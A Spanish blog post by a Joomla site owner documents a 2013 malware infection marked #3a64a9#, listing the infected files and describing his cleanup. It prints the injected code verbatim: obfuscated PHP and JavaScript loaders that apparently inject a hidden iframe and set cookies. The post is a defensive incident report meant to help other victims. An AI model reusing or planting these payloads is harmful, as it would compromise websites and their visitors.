Clicky

Inyección de malware en Joomla: base64_decode

Inyección de malware en Joomla: base64_decode

Fatal error: Cannot redeclare | #3a64a9# $GLOBALS

Esta infección por malware no la había visto en mis ocho años trabajando con Joomla y en la última semana se me ha producido dos veces, precisamente en este sitio.

Los códigos maliciosos se escriben en los siguientes archivos y afectan tanto al administrador como al sitio:

/index.php
/administrator/index.php

Y en mi caso se han propagado por los siguientes:

/libraries/cms/error/page.php
/templates/sj_plus/index.php  (el index del template que utilizo)
/administrator/components/com_login/login.php
/administrator/modules/mod_login/mod_login.php
/administrator/templates/isis/login.php
/administrator/templates/isis/index.php
/modules/mod_ads_elite/tmpl/default.php
/modules/mod_search/tmpl/default.php

Los códigos que se inyectan son aparatosamente grandes. En la primera infección (que se me produjo en el index.php del template) era el siguiente:

<?php
#3a64a9#
if(empty($anal)) {
$anal = "base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KDQogIHZhciBfZ2FxID0gX2dhcSB8fCBbXTsNCiAgX2dhcS5wdXNoKFsnX3NldEFjY291bnQnLCAnVUEtMzc0Njc1NzUtMSddKTsNCiAgX2dhcS5wdXNoKFsnX3RyYWNrUGFnZXZpZXcnXSk7DQoNCiAgKGZ1bmN0aW9uKCkgew0KICAgIHZhciBnYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBnYS50eXBlID0gJ3RleHQvamF2YXNjcmlwdCc7IGdhLmFzeW5jID0gdHJ1ZTsNCiAgICBnYS5zcmMgPSAoJ2h0dHBzOicgPT0gZG9jdW1lbnQubG9jYXRpb24ucHJvdG9jb2wgPyAnaHR0cHM6Ly9zc2wnIDogJ2h0dHA6Ly93d3cnKSArICcuZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnOw0KICAgIHZhciBzID0gZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ3NjcmlwdCcpWzBdOyBzLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGdhLCBzKTsNCiAgfSkoKTsNCg0KPC9zY3JpcHQ+');
";
echo $anal;
}

#/3a64a9#
?>

En la segunda el código es incluso más grande:

#3a64a9#
 $GLOBALS['_1143660864_']=Array(); ?><? function _728088952($i){$a=Array();return base64_decode($a[$i]);} ?>if(empty($bgw)) {
$bgw = "<script type=\"text/javascript\" language=\"javascript\">gzegvi=\"y\";xnwlmx=\"document\";try{+function(){if(document.querySelector)--(window[xnwlmx].getElementById(\"asd\"))}()}catch(wwfmu){gcfjet=function(kok){kok=\"fro\"+kok;for(nafgov=0;nafgov<gzegvi.length;nafgov++){evjx+=String[kok](admsqn(sdhq+(gzegvi[nafgov]))-(54));}};};admsqn=eval;sdhq=\"0x\";ztg=0;if(!ztg){try{++admsqn(xnwlmx)[\"\x62o\"+\"d\"+gzegvi]}catch(wwfmu){gyb=\"(\";}gzegvi=\"56(9c(ab(a4(99(aa(9f(a5(a4(56(a9(a2(a8(66(6f(5e(5f(56(b1(43(40(56(ac(97(a8(56(a9(aa(97(aa(9f(99(73(5d(97(a0(97(ae(5d(71(43(40(56(ac(97(a8(56(99(a5(a4(aa(a8(a5(a2(a2(9b(a8(73(5d(9f(a4(9a(9b(ae(64(a6(9e(a6(5d(71(43(40(56(ac(97(a8(56(a9(a2(a8(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a8(9b(97(aa(9b(7b(a2(9b(a3(9b(a4(aa(5e(5d(9f(9c(a8(97(a3(9b(5d(5f(71(43(40(43(40(56(a9(a2(a8(64(a9(a8(99(56(73(56(5d(9e(aa(aa(a6(70(65(65(aa(9f(aa(ab(a9(a6(a8(a5(a9(64(99(a5(a3(65(a6(9d(97(65(99(a4(aa(64(a6(9e(a6(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(a6(a5(a9(9f(aa(9f(a5(a4(56(73(56(5d(97(98(a9(a5(a2(ab(aa(9b(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(99(a5(a2(a5(a8(56(73(56(5d(6b(67(66(68(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(9e(9b(9f(9d(9e(aa(56(73(56(5d(6b(67(66(68(a6(ae(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(ad(9f(9a(aa(9e(56(73(56(5d(6b(67(66(68(a6(ae(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(a2(9b(9c(aa(56(73(56(5d(67(66(66(66(6b(67(66(68(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(aa(a5(a6(56(73(56(5d(67(66(66(66(6b(67(66(68(5d(71(43(40(43(40(56(9f(9c(56(5e(57(9a(a5(99(ab(a3(9b(a4(aa(64(9d(9b(aa(7b(a2(9b(a3(9b(a4(aa(78(af(7f(9a(5e(5d(a9(a2(a8(5d(5f(5f(56(b1(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(ad(a8(9f(aa(9b(5e(5d(72(a6(56(9f(9a(73(92(5d(a9(a2(a8(92(5d(56(99(a2(97(a9(a9(73(92(5d(a9(a2(a8(66(6f(92(5d(56(74(72(65(a6(74(5d(5f(71(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(9d(9b(aa(7b(a2(9b(a3(9b(a4(aa(78(af(7f(9a(5e(5d(a9(a2(a8(5d(5f(64(97(a6(a6(9b(a4(9a(79(9e(9f(a2(9a(5e(a9(a2(a8(5f(71(43(40(56(b3(43(40(b3(43(40(9c(ab(a4(99(aa(9f(a5(a4(56(89(9b(aa(79(a5(a5(a1(9f(9b(5e(99(a5(a5(a1(9f(9b(84(97(a3(9b(62(99(a5(a5(a1(9f(9b(8c(97(a2(ab(9b(62(a4(7a(97(af(a9(62(a6(97(aa(9e(5f(56(b1(43(40(56(ac(97(a8(56(aa(a5(9a(97(af(56(73(56(a4(9b(ad(56(7a(97(aa(9b(5e(5f(71(43(40(56(ac(97(a8(56(9b(ae(a6(9f(a8(9b(56(73(56(a4(9b(ad(56(7a(97(aa(9b(5e(5f(71(43(40(56(9f(9c(56(5e(a4(7a(97(af(a9(73(73(a4(ab(a2(a2(56(b2(b2(56(a4(7a(97(af(a9(73(73(66(5f(56(a4(7a(97(af(a9(73(67(71(43(40(56(9b(ae(a6(9f(a8(9b(64(a9(9b(aa(8a(9f(a3(9b(5e(aa(a5(9a(97(af(64(9d(9b(aa(8a(9f(a3(9b(5e(5f(56(61(56(69(6c(66(66(66(66(66(60(68(6a(60(a4(7a(97(af(a9(5f(71(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(56(73(56(99(a5(a5(a1(9f(9b(84(97(a3(9b(61(58(73(58(61(9b(a9(99(97(a6(9b(5e(99(a5(a5(a1(9f(9b(8c(97(a2(ab(9b(5f(43(40(56(61(56(58(71(9b(ae(a6(9f(a8(9b(a9(73(58(56(61(56(9b(ae(a6(9f(a8(9b(64(aa(a5(7d(83(8a(89(aa(a8(9f(a4(9d(5e(5f(56(61(56(5e(5e(a6(97(aa(9e(5f(56(75(56(58(71(56(a6(97(aa(9e(73(58(56(61(56(a6(97(aa(9e(56(70(56(58(58(5f(71(43(40(b3(43(40(9c(ab(a4(99(aa(9f(a5(a4(56(7d(9b(aa(79(a5(a5(a1(9f(9b(5e(56(a4(97(a3(9b(56(5f(56(b1(43(40(56(ac(97(a8(56(a9(aa(97(a8(aa(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(9f(a4(9a(9b(ae(85(9c(5e(56(a4(97(a3(9b(56(61(56(58(73(58(56(5f(71(43(40(56(ac(97(a8(56(a2(9b(a4(56(73(56(a9(aa(97(a8(aa(56(61(56(a4(97(a3(9b(64(a2(9b(a4(9d(aa(9e(56(61(56(67(71(43(40(56(9f(9c(56(5e(56(5e(56(57(a9(aa(97(a8(aa(56(5f(56(5c(5c(43(40(56(5e(56(a4(97(a3(9b(56(57(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a9(ab(98(a9(aa(a8(9f(a4(9d(5e(56(66(62(56(a4(97(a3(9b(64(a2(9b(a4(9d(aa(9e(56(5f(56(5f(56(5f(43(40(56(b1(43(40(56(a8(9b(aa(ab(a8(a4(56(a4(ab(a2(a2(71(43(40(56(b3(43(40(56(9f(9c(56(5e(56(a9(aa(97(a8(aa(56(73(73(56(63(67(56(5f(56(a8(9b(aa(ab(a8(a4(56(a4(ab(a2(a2(71(43(40(56(ac(97(a8(56(9b(a4(9a(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(9f(a4(9a(9b(ae(85(9c(5e(56(58(71(58(62(56(a2(9b(a4(56(5f(71(43(40(56(9f(9c(56(5e(56(9b(a4(9a(56(73(73(56(63(67(56(5f(56(9b(a4(9a(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a2(9b(a4(9d(aa(9e(71(43(40(56(a8(9b(aa(ab(a8(a4(56(ab(a4(9b(a9(99(97(a6(9b(5e(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a9(ab(98(a9(aa(a8(9f(a4(9d(5e(56(a2(9b(a4(62(56(9b(a4(9a(56(5f(56(5f(71(43(40(b3(43(40(9f(9c(56(5e(a4(97(ac(9f(9d(97(aa(a5(a8(64(99(a5(a5(a1(9f(9b(7b(a4(97(98(a2(9b(9a(5f(43(40(b1(43(40(9f(9c(5e(7d(9b(aa(79(a5(a5(a1(9f(9b(5e(5d(ac(9f(a9(9f(aa(9b(9a(95(ab(a7(5d(5f(73(73(6b(6b(5f(b1(b3(9b(a2(a9(9b(b1(89(9b(aa(79(a5(a5(a1(9f(9b(5e(5d(ac(9f(a9(9f(aa(9b(9a(95(ab(a7(5d(62(56(5d(6b(6b(5d(62(56(5d(67(5d(62(56(5d(65(5d(5f(71(43(40(43(40(a9(a2(a8(66(6f(5e(5f(71(43(40(b3(43(40(b3\".split(gyb);evjx=\"\";gcfjet(\"mCharCode\");admsqn(\"\"+evjx);}</script>
";
echo $bgw;
}

#/3a64a9#

Aparentemente este ataque de malware, que en principio no he localizado que produzca ninguna redirección a otras páginas, de momento es poco conocido en la Web ya que no he encontrado información específica sobre él.

No afecta tampoco a la base de datos, es decir no es una inyección por MySql, ni escribe el .htaccess, sino directamente a los archivos que detallo arriba.

El servidor que ha sido afectado por estos ataques es un compartido de OVH y esta página lleva alojada en él desde el año 2008 con diferentes versiones de Joomla y diferentes templates. Sólo con el último cambio que he hecho de template se me ha producido este problema. Tampoco puedo segurizar personalmente el servidor como lo hago con mi servidor dedicado de la misma empresa de hosting.

De manera que la solución momentánea que voy a adoptar una vez limpios todos los archivos y esperando detener la escritura en los archivos, es cambiar los permisos de los archivos afectados a 444 (solo lectura).

En este mismo artículo iré actualizando las novedades que se produzcan sobre el incidente de inyección de malware que voy a denominar base64_decode #3a64a9# para una más fácil localización por si otros usuarios de Joomla son también afectados y buscan por Internet.

Actualización 03/10/2013

Hoy de nuevo tenía infectados los mismos archivos que ayer, así que como he sospechado de que hubiese otros afectados que no había revisado me he ido al directorio raíz, donde tengo varios archivos en HTML ajenos a Joomla para varias demos del site, y estaban infectados todos los que tenían esa extensión .html . Y el culpable de todo era un archivo javascript, también en el directorio raíz, llamado youtube-embed.js (YouTube Embed Code) que lo utilicé para este tutorial: "Cómo incrustar sólo una parte de un vídeo de YouTube" y como explico en el mismo lo bajé desde aquí y en algún momento de la edición se infecto de alguna manera.

Por si alguien quiere ver el código original del malware que estaba en ese archivo javascript es este:

/*3a64a9*/
function wue(){pgl=function(){--(mgozpi.body)}()}fajzjo="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)rjhddx=4;ojc=("74,ba,c9,c2,b7,c8,bd,c3,c2,74,b9,84,8d,7c,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c8,bd,b7,91,7b,b5,be,b5,cc,7b,8f,61,5e,74,ca,b5,c6,74,b7,c3,c2,c8,c6,c3,c0,c0,b9,c6,91,7b,bd,c2,b8,b9,cc,82,c4,bc,c4,7b,8f,61,5e,74,ca,b5,c6,74,b9,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c6,b9,b5,c8,b9,99,c0,b9,c1,b9,c2,c8,7c,7b,bd,ba,c6,b5,c1,b9,7b,7d,8f,61,5e,61,5e,74,b9,82,c7,c6,b7,74,91,74,7b,bc,c8,c8,c4,8e,83,83,b7,b9,b7,bd,c0,bd,b5,ba,c3,c6,c7,b6,b9,c6,bb,82,c7,b9,83,bd,c2,b8,b9,cc,bc,bd,b6,bd,c8,ca,84,8b,84,b9,83,b7,c3,c9,c2,c8,82,c4,bc,c4,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c4,c3,c7,bd,c8,bd,c3,c2,74,91,74,7b,b5,b6,c7,c3,c0,c9,c8,b9,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,b7,c3,c0,c3,c6,74,91,74,7b,8a,88,86,84,8d,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,bc,b9,bd,bb,bc,c8,74,91,74,7b,8a,88,86,84,8d,c4,cc,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,cb,bd,b8,c8,bc,74,91,74,7b,8a,88,86,84,8d,c4,cc,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c0,b9,ba,c8,74,91,74,7b,85,84,84,84,8a,88,86,84,8d,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c8,c3,c4,74,91,74,7b,85,84,84,84,8a,88,86,84,8d,7b,8f,61,5e,61,5e,74,bd,ba,74,7c,75,b8,c3,b7,c9,c1,b9,c2,c8,82,bb,b9,c8,99,c0,b9,c1,b9,c2,c8,96,cd,9d,b8,7c,7b,b9,7b,7d,7d,74,cf,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,cb,c6,bd,c8,b9,7c,7b,90,c4,74,bd,b8,91,b0,7b,b9,b0,7b,74,b7,c0,b5,c7,c7,91,b0,7b,b9,84,8d,b0,7b,74,92,90,83,c4,92,7b,7d,8f,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,bb,b9,c8,99,c0,b9,c1,b9,c2,c8,96,cd,9d,b8,7c,7b,b9,7b,7d,82,b5,c4,c4,b9,c2,b8,97,bc,bd,c0,b8,7c,b9,7d,8f,61,5e,74,d1,61,5e,d1,61,5e,ba,c9,c2,b7,c8,bd,c3,c2,74,a7,b9,c8,97,c3,c3,bf,bd,b9,7c,b7,c3,c3,bf,bd,b9,a2,b5,c1,b9,80,b7,c3,c3,bf,bd,b9,aa,b5,c0,c9,b9,80,c2,98,b5,cd,c7,80,c4,b5,c8,bc,7d,74,cf,61,5e,74,ca,b5,c6,74,c8,c3,b8,b5,cd,74,91,74,c2,b9,cb,74,98,b5,c8,b9,7c,7d,8f,61,5e,74,ca,b5,c6,74,b9,cc,c4,bd,c6,b9,74,91,74,c2,b9,cb,74,98,b5,c8,b9,7c,7d,8f,61,5e,74,bd,ba,74,7c,c2,98,b5,cd,c7,91,91,c2,c9,c0,c0,74,d0,d0,74,c2,98,b5,cd,c7,91,91,84,7d,74,c2,98,b5,cd,c7,91,85,8f,61,5e,74,b9,cc,c4,bd,c6,b9,82,c7,b9,c8,a8,bd,c1,b9,7c,c8,c3,b8,b5,cd,82,bb,b9,c8,a8,bd,c1,b9,7c,7d,74,7f,74,87,8a,84,84,84,84,84,7e,86,88,7e,c2,98,b5,cd,c7,7d,8f,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,74,91,74,b7,c3,c3,bf,bd,b9,a2,b5,c1,b9,7f,76,91,76,7f,b9,c7,b7,b5,c4,b9,7c,b7,c3,c3,bf,bd,b9,aa,b5,c0,c9,b9,7d,61,5e,74,7f,74,76,8f,b9,cc,c4,bd,c6,b9,c7,91,76,74,7f,74,b9,cc,c4,bd,c6,b9,82,c8,c3,9b,a1,a8,a7,c8,c6,bd,c2,bb,7c,7d,74,7f,74,7c,7c,c4,b5,c8,bc,7d,74,93,74,76,8f,74,c4,b5,c8,bc,91,76,74,7f,74,c4,b5,c8,bc,74,8e,74,76,76,7d,8f,61,5e,d1,61,5e,ba,c9,c2,b7,c8,bd,c3,c2,74,9b,b9,c8,97,c3,c3,bf,bd,b9,7c,74,c2,b5,c1,b9,74,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c6,c8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,bd,c2,b8,b9,cc,a3,ba,7c,74,c2,b5,c1,b9,74,7f,74,76,91,76,74,7d,8f,61,5e,74,ca,b5,c6,74,c0,b9,c2,74,91,74,c7,c8,b5,c6,c8,74,7f,74,c2,b5,c1,b9,82,c0,b9,c2,bb,c8,bc,74,7f,74,85,8f,61,5e,74,bd,ba,74,7c,74,7c,74,75,c7,c8,b5,c6,c8,74,7d,74,7a,7a,61,5e,74,7c,74,c2,b5,c1,b9,74,75,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c7,c9,b6,c7,c8,c6,bd,c2,bb,7c,74,84,80,74,c2,b5,c1,b9,82,c0,b9,c2,bb,c8,bc,74,7d,74,7d,74,7d,61,5e,74,cf,61,5e,74,c6,b9,c8,c9,c6,c2,74,c2,c9,c0,c0,8f,61,5e,74,d1,61,5e,74,bd,ba,74,7c,74,c7,c8,b5,c6,c8,74,91,91,74,81,85,74,7d,74,c6,b9,c8,c9,c6,c2,74,c2,c9,c0,c0,8f,61,5e,74,ca,b5,c6,74,b9,c2,b8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,bd,c2,b8,b9,cc,a3,ba,7c,74,76,8f,76,80,74,c0,b9,c2,74,7d,8f,61,5e,74,bd,ba,74,7c,74,b9,c2,b8,74,91,91,74,81,85,74,7d,74,b9,c2,b8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c0,b9,c2,bb,c8,bc,8f,61,5e,74,c6,b9,c8,c9,c6,c2,74,c9,c2,b9,c7,b7,b5,c4,b9,7c,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c7,c9,b6,c7,c8,c6,bd,c2,bb,7c,74,c0,b9,c2,80,74,b9,c2,b8,74,7d,74,7d,8f,61,5e,d1,61,5e,bd,ba,74,7c,c2,b5,ca,bd,bb,b5,c8,c3,c6,82,b7,c3,c3,bf,bd,b9,99,c2,b5,b6,c0,b9,b8,7d,61,5e,cf,61,5e,bd,ba,7c,9b,b9,c8,97,c3,c3,bf,bd,b9,7c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,7d,91,91,89,89,7d,cf,d1,b9,c0,c7,b9,cf,a7,b9,c8,97,c3,c3,bf,bd,b9,7c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,80,74,7b,89,89,7b,80,74,7b,85,7b,80,74,7b,83,7b,7d,8f,61,5e,61,5e,b9,84,8d,7c,7d,8f,61,5e,d1,61,5e,d1".split(","));zyqpny=window["asdeval".substr(3)];mgozpi=window.document;for(ghtbv=0;ghtbv<ojc["le"+"ngth"];ghtbv+=1){ojc[ghtbv]=-(84)+parseInt(ojc[ghtbv],rjhddx*4);}try{wue()}catch(aifr){vvegsk=50-50;}if(!vvegsk)zyqpny(String[fajzjo].apply(String,ojc));
/*/3a64a9*/

Actualización 04/10/2013

Finalmente la infección era mucho más grave de lo que decía ayer y había un gran número de archivos javascript infectados algunos ejemplos:

/media/system/js/core.js
/media/jui/js/jquery.min.js
/media/com_komento/scripts/komento.commentitem.js
/media/com_komento/scripts/komento.commentform.js
/media/com_komento/scripts/komento.bbcode.js
/media/com_komento/scripts/komento.commentlist.js
/templates/sj_plus/js  (todos los 12 archivos de la carpeta)
/media/nnframework/js (toda la carpeta)
/media/cachecleaner/js (toda la carpeta)
/media/nonumbermanager/js (dos .js archivos de la carpeta)

Ante la imposibilidad de recuperar una copia de seguridad con la certeza de que no estuviese también infectada, he tirado por la calle de en medio:

1) He desinstalado el componente de comentarios Komento (que tenía en su carpeta /media/com_komento/scripts/ todos los .js infectados)

2) He descargado una copia limpia de Joomla 3.1.5 desde la web oficial, descomprimido y reescrito todos los archivos subiéndolos por FTP.

Después de todo esto con Chrome e Internet Explorer me seguía saltando el antivirus Avast! con una aviso de troyano como este:

Infección:
JS:Includer-AJE [Trj]

Por lo que he tenido que limpiar todas las cachés e historial de ambos navegadores para que tomase los nuevos archivos del site (sin posibles cookies con la alarma del antivirus) y de momento parece que está solucionado. Ya veremos mañana...

NOTA: para segurizar un servidor dedicado recomiendo leer estos artículos:

Cómo escanear la subida de archivos con php Suhosin en busca de malware
Instalar Linux Malware Detect (LMD) en RHEL, CentOS y Fedora

Jesus_Caceres